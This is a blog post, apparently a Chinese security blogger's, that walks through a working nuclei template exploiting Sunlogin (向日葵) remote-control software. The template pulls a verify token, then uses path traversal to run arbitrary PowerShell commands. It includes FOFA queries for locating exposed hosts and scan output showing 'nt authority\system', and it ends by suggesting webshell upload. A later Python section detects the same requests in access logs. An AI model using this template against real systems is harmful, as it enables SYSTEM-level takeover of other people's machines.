How to use nuclei to rce with any command
A few weeks ago, I realized that we can use nuclei to get RCE with any command. Nuclei is a fast and customisable vulnerability scanner based on a simple YAML-based DSL, and we can find a lot of vulnerabilities with it.
Nuclei has flags for specific functions, such as -dresp and -V.
Some flags
-dresp: show all received responses for all templates.
-V: customize vars in key=value format.
Nuclei template
There is a template field (variables) which can be used to define custom vars in a nuclei template. For example:
id: sunlogin_rce

info:
  name: 向日葵RCE
  author: Xc1Ym
  severity: critical
  description: 通过该链接可以执行命令
  metadata:
    max-request: 2
    verified: true
    fofa-query1: body="Verification failure"
    fofa-query2: app="向日葵-远程控制"
  tags: rce

variables:
  cmd: "ipconfig"

http:
  - raw:
      - |
        GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+{{cmd}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}

    extractors:
      - type: json
        part: body
        internal: true
        name: cid
        json:
          - '.verify_string'

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "contains(body_1, 'verify_string')"
          - "status_code_2==200"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 490a0046304402200b08d3b3306a25fe78dc7485bc5f3f766a1189738e6d89ae775afa9ed4d3f1d1022002274e233fe7383a0c9e87f6c09ddbdad543c653e6d0592d813e76c7235eae57:ac885261be3fdd93c33050b022a2b6f1
We have set the default value of the cmd variable to ipconfig. If we wish to change it to whoami, we can use the -V flag. We can also use the -dresp flag to show all received responses for all templates, which is useful once we know that the IP is vulnerable.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[sunlogin_rce] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
Use -dresp to show the received responses.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras
HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html
{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
HTTP/1.1 200 OK
Content-Length: 750
Cache-Control: no-cache
Content-Type: text/json
Windows IP 配置
以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : xxx
IPv4 地址 . . . . . . . . . . . . : xxx
子网掩码 . . . . . . . . . . . . : xxx
默认网关. . . . . . . . . . . . . : xxx
隧道适配器 isatap.{xxx}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : xxx
本地链接 IPv6 地址. . . . . . . . : xxx
默认网关. . . . . . . . . . . . . : ::
[sunlogin_rce:dsl-1] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
Use -V to customize vars. We can see that nuclei executed whoami and shows the result.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp -V cmd=whoami
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras
HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html
{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
HTTP/1.1 200 OK
Content-Length: 21
Cache-Control: no-cache
Content-Type: text/json
nt authority\system
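The two requests dumped above leave a recognisable trace on the server side. As an added, defender-side example (not from the original post or the nuclei project), here is a Python check that looks for that exchange in web-server access logs: the log lines are constructed and the "source method target" format is an assumption. It recovers whatever value was substituted for {{cmd}} (it follows powershell.exe verbatim, whether it came from the template default or from -V), correlates the /check request with a preceding verify-haras call from the same source, and also catches a double-encoded traversal.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (not from the page): "<source IP> <method> <target>". The first
# source performs the two-step exchange shown above; the second skips verify-haras and double-encodes.
SAMPLE_LOG = """\
203.0.113.5 GET /cgi-bin/rpc?action=verify-haras
203.0.113.5 GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
198.51.100.9 GET /check?cmd=ping+127.0.0.1
198.51.100.9 GET /check?cmd=ping..%252F..%252Fwindows%252Fsystem32%252FWindowsPowerShell%252Fv1.0%252Fpowershell.exe+ipconfig
"""
LINE_RE = re.compile(r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<target>\S+)$")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded %252F is still seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return ('verify', None), ('rce', <shell command>) or (None, None) for one request."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once, '+' becomes ' '
    if parts.path == "/cgi-bin/rpc" and query.get("action") == ["verify-haras"]:
        return "verify", None
    if parts.path == "/check" and "cmd" in query:
        cmd = decode_fully(query["cmd"][0])
        idx = cmd.lower().find("powershell.exe")
        if idx != -1 and TRAVERSAL_RE.search(cmd):  # text after powershell.exe is the {{cmd}} value
            return "rce", cmd[idx + len("powershell.exe"):].strip()
    return None, None

def detect(log_text):
    """Flag traversal-to-powershell /check requests, noting if the source hit verify-haras first."""
    seen_verify, findings = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind, shell_cmd = classify(m["target"])
        if kind == "verify":
            seen_verify.add(m["src"])
        elif kind == "rce":
            findings.append({"src": m["src"], "cmd": shell_cmd,
                             "verify_first": m["src"] in seen_verify})
    return findings
```

A plain `ping 127.0.0.1` to /check is left alone; only a cmd value that traverses to powershell.exe is reported, together with the command that followed it.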
In the end
If you want to get RCE with any command, you can use variables in your template.
You can also use nuclei to upload a webshell and execute commands through it.
Link to "How to use nuclei to rce with any command": https://xdym11235.com/archives/297.html